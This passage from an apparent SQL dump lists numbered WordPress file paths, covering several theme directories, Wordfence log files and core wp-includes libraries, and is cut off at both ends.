hoot/template-parts/slider-image.php'),(1948,'wp-content/themes/magazine-hoot/template-parts/topbar.php'),(1949,'wp-content/themes/magazine-hoot/widget/announce.php'),(1950,'wp-content/themes/magazine-hoot/widget/content-blocks.php'),(1951,'wp-content/themes/magazine-hoot/widget/content-posts-blocks.php'),(1952,'wp-content/themes/magazine-hoot/widget/cta.php'),(1953,'wp-content/themes/magazine-hoot/widget/post-grid.php'),(1954,'wp-content/themes/magazine-hoot/widget/posts-list.php'),(1955,'wp-content/themes/magazine-hoot/widget/social-icons.php'),(1956,'wp-content/themes/twentynineteen/404.php'),(1957,'wp-content/themes/twentynineteen/archive.php'),(1958,'wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(1959,'wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(1960,'wp-content/themes/twentynineteen/comments.php'),(1961,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(1962,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(1963,'wp-content/themes/twentynineteen/footer.php'),(1964,'wp-content/themes/twentynineteen/functions.php'),(1965,'wp-content/themes/twentynineteen/header.php'),(1966,'wp-content/themes/twentynineteen/image.php'),(1967,'wp-content/themes/twentynineteen/images/pattern_01.jpg'),(1968,'wp-content/themes/twentynineteen/images/pattern_02.jpg'),(1969,'wp-content/themes/twentynineteen/images/pattern_03.jpg'),(1970,'wp-content/themes/twentynineteen/images/pattern_04.jpg'),(1971,'wp-content/themes/twentynineteen/inc/back-compat.php'),(1972,'wp-content/themes/twentynineteen/inc/block-patterns.php'),(1973,'wp-content/themes/twentynineteen/inc/color-patterns.php'),(1974,'wp-content/themes/twentynineteen/inc/customizer.php'),(1975,'wp-content/themes/twentynineteen/inc/helper-functions.php'),(1976,'wp-content/themes/twentynineteen/inc/icon-functions.php'),(1977,'wp-content/themes/twentynineteen/inc/template-functions.php'),(1978,'wp-content/themes/twentynineteen/inc/template-tags.php'),(1979,'wp-content/themes/twentynineteen/index.php'),(1980,'wp-content/themes/twentynineteen/js/customize-controls.js'),(1981,'wp-content/themes/twentynineteen/js/customize-preview.js'),(1982,'wp-content/themes/twentynineteen/js/priority-menu.js'),(1983,'wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(1984,'wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(1985,'wp-content/themes/twentynineteen/package-lock.json'),(1986,'wp-content/themes/twentynineteen/package.json'),(1987,'wp-content/themes/twentynineteen/page.php'),(1988,'wp-content/themes/twentynineteen/postcss.config.js'),(1989,'wp-content/themes/twentynineteen/print.css'),(1990,'wp-content/themes/twentynineteen/print.scss'),(1991,'wp-content/themes/twentynineteen/readme.txt'),(1992,'wp-content/themes/twentynineteen/sass/_normalize.scss'),(1993,'wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(1994,'wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(1995,'wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(1996,'wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(1997,'wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(1998,'wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(1999,'wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(2000,'wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(2001,'wp-content/themes/twentynineteen/sass/media/_captions.scss'),(2002,'wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(2003,'wp-content/themes/twentynineteen/sass/media/_media.scss'),(2004,'wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(2005,'wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(2006,'wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(2007,'wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(2008,'wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(2009,'wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(2010,'wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(2011,'wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(2012,'wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(2013,'wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(2014,'wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(2015,'wp-content/themes/twentynineteen/sass/site/_site.scss'),(2016,'wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(2017,'wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(2018,'wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(2019,'wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(2020,'wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(2021,'wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(2022,'wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(2023,'wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(2024,'wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(2025,'wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(2026,'wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(2027,'wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(2028,'wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(2029,'wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(2030,'wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(2031,'wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(2032,'wp-content/themes/twentynineteen/screenshot.png'),(2033,'wp-content/themes/twentynineteen/search.php'),(2034,'wp-content/themes/twentynineteen/single.php'),(2035,'wp-content/themes/twentynineteen/style-editor-customizer.css'),(2036,'wp-content/themes/twentynineteen/style-editor-customizer.scss'),(2037,'wp-content/themes/twentynineteen/style-editor.css'),(2038,'wp-content/themes/twentynineteen/style-editor.scss'),(2039,'wp-content/themes/twentynineteen/style-rtl.css'),(2040,'wp-content/themes/twentynineteen/style.css'),(2041,'wp-content/themes/twentynineteen/style.scss'),(2042,'wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(2043,'wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(2044,'wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(2045,'wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(2046,'wp-content/themes/twentynineteen/template-parts/content/content.php'),(2047,'wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(2048,'wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(2049,'wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(2050,'wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(2051,'wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(2052,'wp-content/themes/twentytwenty/.stylelintrc.json'),(2053,'wp-content/themes/twentytwenty/404.php'),(2054,'wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(2055,'wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(2056,'wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(2057,'wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(2058,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(2059,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(2060,'wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(2061,'wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(2062,'wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(2063,'wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(2064,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(2065,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(2066,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(2067,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(2068,'wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(2069,'wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(2070,'wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(2071,'wp-content/themes/twentytwenty/assets/js/customize.js'),(2072,'wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(2073,'wp-content/themes/twentytwenty/assets/js/index.js'),(2074,'wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(2075,'wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(2076,'wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(2077,'wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(2078,'wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(2079,'wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(2080,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(2081,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(2082,'wp-content/themes/twentytwenty/comments.php'),(2083,'wp-content/themes/twentytwenty/footer.php'),(2084,'wp-content/themes/twentytwenty/functions.php'),(2085,'wp-content/themes/twentytwenty/header.php'),(2086,'wp-content/themes/twentytwenty/inc/block-patterns.php'),(2087,'wp-content/themes/twentytwenty/inc/custom-css.php'),(2088,'wp-content/themes/twentytwenty/inc/starter-content.php'),(2089,'wp-content/themes/twentytwenty/inc/svg-icons.php'),(2090,'wp-content/themes/twentytwenty/inc/template-tags.php'),(2091,'wp-content/themes/twentytwenty/index.php'),(2092,'wp-content/themes/twentytwenty/package-lock.json'),(2093,'wp-content/themes/twentytwenty/package.json'),(2094,'wp-content/themes/twentytwenty/print.css'),(2095,'wp-content/themes/twentytwenty/readme.txt'),(2096,'wp-content/themes/twentytwenty/screenshot.png'),(2097,'wp-content/themes/twentytwenty/searchform.php'),(2098,'wp-content/themes/twentytwenty/singular.php'),(2099,'wp-content/themes/twentytwenty/style-rtl.css'),(2100,'wp-content/themes/twentytwenty/style.css'),(2101,'wp-content/themes/twentytwenty/template-parts/content-cover.php'),(2102,'wp-content/themes/twentytwenty/template-parts/content.php'),(2103,'wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(2104,'wp-content/themes/twentytwenty/template-parts/entry-header.php'),(2105,'wp-content/themes/twentytwenty/template-parts/featured-image.php'),(2106,'wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(2107,'wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(2108,'wp-content/themes/twentytwenty/template-parts/modal-search.php'),(2109,'wp-content/themes/twentytwenty/template-parts/navigation.php'),(2110,'wp-content/themes/twentytwenty/template-parts/pagination.php'),(2111,'wp-content/themes/twentytwenty/templates/template-cover.php'),(2112,'wp-content/themes/twentytwenty/templates/template-full-width.php'),(2113,'wp-content/themes/twentytwentyone/.stylelintignore'),(2114,'wp-content/themes/twentytwentyone/.stylelintrc-css.json'),(2115,'wp-content/themes/twentytwentyone/.stylelintrc.json'),(2116,'wp-content/themes/twentytwentyone/404.php'),(2117,'wp-content/themes/twentytwentyone/archive.php'),(2118,'wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(2119,'wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(2120,'wp-content/themes/twentytwentyone/assets/css/ie.css'),(2121,'wp-content/themes/twentytwentyone/assets/css/print.css'),(2122,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(2123,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(2124,'wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(2125,'wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(2126,'wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(2127,'wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(2128,'wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(2129,'wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(2130,'wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(2131,'wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(2132,'wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(2133,'wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(2134,'wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(2135,'wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(2136,'wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(2137,'wp-content/themes/twentytwentyone/assets/js/customize.js'),(2138,'wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(2139,'wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(2140,'wp-content/themes/twentytwentyone/assets/js/editor.js'),(2141,'wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(2142,'wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(2143,'wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(2144,'wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(2145,'wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(2146,'wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(2147,'wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(2148,'wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(2149,'wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(2150,'wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(2151,'wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(2152,'wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(2153,'wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(2154,'wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(2155,'wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(2156,'wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(2157,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(2158,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(2159,'wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(2160,'wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(2161,'wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(2162,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(2163,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(2164,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(2165,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(2166,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(2167,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(2168,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(2169,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(2170,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(2171,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(2172,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(2173,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(2174,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(2175,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(2176,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(2177,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(2178,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(2179,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(2180,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(2181,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(2182,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(2183,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(2184,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(2185,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(2186,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(2187,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(2188,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(2189,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(2190,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(2191,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(2192,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(2193,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(2194,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(2195,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(2196,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(2197,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(2198,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(2199,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(2200,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(2201,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(2202,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(2203,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(2204,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(2205,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(2206,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(2207,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(2208,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(2209,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(2210,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(2211,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(2212,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(2213,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss'),(2214,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(2215,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(2216,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(2217,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(2218,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(2219,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss'),(2220,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss'),(2221,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss'),(2222,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss'),(2223,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss'),(2224,'wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss'),(2225,'wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss'),(2226,'wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss'),(2227,'wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss'),(2228,'wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss'),(2229,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss'),(2230,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss'),(2231,'wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss'),(2232,'wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss'),(2233,'wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss'),(2234,'wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss'),(2235,'wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss'),(2236,'wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss'),(2237,'wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss'),(2238,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss'),(2239,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss'),(2240,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss'),(2241,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss'),(2242,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss'),(2243,'wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss'),(2244,'wp-content/themes/twentytwentyone/assets/sass/style-editor.scss'),(2245,'wp-content/themes/twentytwentyone/assets/sass/style.scss'),(2246,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php'),(2247,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php'),(2248,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php'),(2249,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php'),(2250,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php'),(2251,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php'),(2252,'wp-content/themes/twentytwentyone/comments.php'),(2253,'wp-content/themes/twentytwentyone/footer.php'),(2254,'wp-content/themes/twentytwentyone/functions.php'),(2255,'wp-content/themes/twentytwentyone/header.php'),(2256,'wp-content/themes/twentytwentyone/image.php'),(2257,'wp-content/themes/twentytwentyone/inc/back-compat.php'),(2258,'wp-content/themes/twentytwentyone/inc/block-patterns.php'),(2259,'wp-content/themes/twentytwentyone/inc/block-styles.php'),(2260,'wp-content/themes/twentytwentyone/inc/custom-css.php'),(2261,'wp-content/themes/twentytwentyone/inc/menu-functions.php'),(2262,'wp-content/themes/twentytwentyone/inc/starter-content.php'),(2263,'wp-content/themes/twentytwentyone/inc/template-functions.php'),(2264,'wp-content/themes/twentytwentyone/inc/template-tags.php'),(2265,'wp-content/themes/twentytwentyone/index.php'),(2266,'wp-content/themes/twentytwentyone/package-lock.json'),(2267,'wp-content/themes/twentytwentyone/package.json'),(2268,'wp-content/themes/twentytwentyone/page.php'),(2269,'wp-content/themes/twentytwentyone/postcss.config.js'),(2270,'wp-content/themes/twentytwentyone/readme.txt'),(2271,'wp-content/themes/twentytwentyone/screenshot.png'),(2272,'wp-content/themes/twentytwentyone/search.php'),(2273,'wp-content/themes/twentytwentyone/searchform.php'),(2274,'wp-content/themes/twentytwentyone/single.php'),(2275,'wp-content/themes/twentytwentyone/style-rtl.css'),(2276,'wp-content/themes/twentytwentyone/style.css'),(2277,'wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php'),(2278,'wp-content/themes/twentytwentyone/template-parts/content/content-none.php'),(2279,'wp-content/themes/twentytwentyone/template-parts/content/content-page.php'),(2280,'wp-content/themes/twentytwentyone/template-parts/content/content-single.php'),(2281,'wp-content/themes/twentytwentyone/template-parts/content/content.php'),(2282,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php'),(2283,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php'),(2284,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php'),(2285,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php'),(2286,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php'),(2287,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php'),(2288,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php'),(2289,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php'),(2290,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php'),(2291,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php'),(2292,'wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php'),(2293,'wp-content/themes/twentytwentyone/template-parts/header/entry-header.php'),(2294,'wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php'),(2295,'wp-content/themes/twentytwentyone/template-parts/header/site-branding.php'),(2296,'wp-content/themes/twentytwentyone/template-parts/header/site-header.php'),(2297,'wp-content/themes/twentytwentyone/template-parts/header/site-nav.php'),(2298,'wp-content/themes/twentytwentyone/template-parts/post/author-bio.php'),(2299,'wp-content/wflogs/attack-data.php'),(2300,'wp-content/wflogs/config-livewaf.php'),(2301,'wp-content/wflogs/config-synced.php'),(2302,'wp-content/wflogs/config-transient.php'),(2303,'wp-content/wflogs/config.php'),(2304,'wp-content/wflogs/ips.php'),(2305,'wp-content/wflogs/rules.php'),(2306,'wp-content/wflogs/template.php'),(2307,'wp-cron.php'),(2308,'wp-includes/ID3/getid3.lib.php'),(2309,'wp-includes/ID3/getid3.php'),(2310,'wp-includes/ID3/license.commercial.txt'),(2311,'wp-includes/ID3/license.txt'),(2312,'wp-includes/ID3/module.audio-video.asf.php'),(2313,'wp-includes/ID3/module.audio-video.flv.php'),(2314,'wp-includes/ID3/module.audio-video.matroska.php'),(2315,'wp-includes/ID3/module.audio-video.quicktime.php'),(2316,'wp-includes/ID3/module.audio-video.riff.php'),(2317,'wp-includes/ID3/module.audio.ac3.php'),(2318,'wp-includes/ID3/module.audio.dts.php'),(2319,'wp-includes/ID3/module.audio.flac.php'),(2320,'wp-includes/ID3/module.audio.mp3.php'),(2321,'wp-includes/ID3/module.audio.ogg.php'),(2322,'wp-includes/ID3/module.tag.apetag.php'),(2323,'wp-includes/ID3/module.tag.id3v1.php'),(2324,'wp-includes/ID3/module.tag.id3v2.php'),(2325,'wp-includes/ID3/module.tag.lyrics3.php'),(2326,'wp-includes/ID3/readme.txt'),(2327,'wp-includes/IXR/class-IXR-base64.php'),(2328,'wp-includes/IXR/class-IXR-client.php'),(2329,'wp-includes/IXR/class-IXR-clientmulticall.php'),(2330,'wp-includes/IXR/class-IXR-date.php'),(2331,'wp-includes/IXR/class-IXR-error.php'),(2332,'wp-includes/IXR/class-IXR-introspectionserver.php'),(2333,'wp-includes/IXR/class-IXR-message.php'),(2334,'wp-includes/IXR/class-IXR-request.php'),(2335,'wp-includes/IXR/class-IXR-server.php'),(2336,'wp-includes/IXR/class-IXR-value.php'),(2337,'wp-includes/PHPMailer/Exception.php'),(2338,'wp-includes/PHPMailer/PHPMailer.php'),(2339,'wp-includes/PHPMailer/SMTP.php'),(2340,'wp-includes/Requests/Auth/Basic.php'),(2341,'wp-includes/Requests/Auth.php'),(2342,'wp-includes/Requests/Cookie/Jar.php'),(2343,'wp-includes/Requests/Cookie.php'),(2344,'wp-includes/Requests/Exception/HTTP/304.php'),(2345,'wp-includes/Requests/Exception/HTTP/305.php'),(2346,'wp-includes/Requests/Exception/HTTP/306.php'),(2347,'wp-includes/Requests/Exception/HTTP/400.php'),(2348,'wp-includes/Requests/Exception/HTTP/401.php'),(2349,'wp-includes/Requests/Exception/HTTP/402.php'),(2350,'wp-includes/Requests/Exception/HTTP/403.php'),(2351,'wp-includes/Requests/Exception/HTTP/404.php'),(2352,'wp-includes/Requests/Exception/HTTP/405.php'),(2353,'wp-includes/Requests/Exception/HTTP/406.php'),(2354,'wp-includes/Requests/Exception/HTTP/407.php'),(2355,'wp-includes/Requests/Exception/HTTP/408.php'),(2356,'wp-includes/Requests/Exception/HTTP/409.php'),(2357,'wp-includes/Requests/Exception/HTTP/410.php'),(2358,'wp-includes/Requests/Exception/HTTP/411.php'),(2359,'wp-includes/Requests/Exception/HTTP/412.php'),(2360,'wp-includes/Requests/Exception/HTTP/413.php'),(2361,'wp-includes/Requests/Exception/HTTP/414.php'),(2362,'wp-includes/Requests/Exception/HTTP/415.php'),(2363,'wp-includes/Requests/Exception/HTTP/416.php'),(2364,'wp-includes/Requests/Exception/HTTP/417.php'),(2365,'wp-includes/Requests/Exception/HTTP/418.php'),(2366,'wp-includes/Requests/Exception/HTTP/428.php'),(2367,'wp-includes/Requests/Exception/HTTP/429.php'),(2368,'wp-includes/Requests/Exception/HTTP/431.php'),(2369,'wp-includes/Requests/Exception/HTTP/500.php'),(2370,'wp-includes/Requests/Exception/HTTP/501.php'),(2371,'wp-includes/Requests/Exception/HTTP/502.php'),(2372,'wp-includes/Requests/Exception/HTTP/503.php'),(2373,'wp-includes/Requests/Exception/HTTP/504.php'),(2374,'wp-includes/Requests/Exception/HTTP/505.php'),(2375,'wp-includes/Requests/Exception/HTTP/511.php'),(2376,'wp-includes/Requests/Exception/HTTP/Unknown.php'),(2377,'wp-includes/Requests/Exception/HTTP.php'),(2378,'wp-includes/Requests/Exception/Transport/cURL.php'),(2379,'wp-includes/Requests/Exception/Transport.php'),(2380,'wp-includes/Requests/Exception.php'),(2381,'wp-includes/Requests/Hooker.php'),(2382,'wp-includes/Requests/Hooks.php'),(2383,'w